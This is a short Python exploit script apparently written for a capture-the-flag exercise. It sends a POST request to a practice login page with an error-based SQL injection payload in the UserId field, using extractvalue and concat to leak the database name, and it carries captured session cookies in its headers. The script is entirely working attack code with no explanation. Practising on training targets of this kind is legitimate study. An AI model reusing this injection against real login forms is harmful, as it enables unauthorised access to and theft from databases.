import requests

url = "http://ctf.segfaulthub.com:7777/sqli_2/login.php"
headers = {
    "Host": "ctf.segfaulthub.com:7777",
    "Cache-Control": "max-age=0",
    "Upgrade-Insecure-Requests": "1",
    "Origin": "http://ctf.segfaulthub.com:7777",
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Referer": "http://ctf.segfaulthub.com:7777/sqli_2/login.php",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7",
    "Cookie": "session=f5c66545-b26c-45ea-a674-43542784a5fb.6DNPkC-EQhGBmhiZy7FOx8xgM4U; PHPSESSID=1bvfrqfng2c0a8k1lkep1ug1q3",
    "Connection": "keep-alive"
}

data = {
    "UserId": "normaltic' and (extractvalue('1', concat(0x3a, database()))) and '1' = '1",
    "Password": "1234",
    "Submit": "Login"
}

response = requests.post(url, headers=headers, data=data)
print(response.text)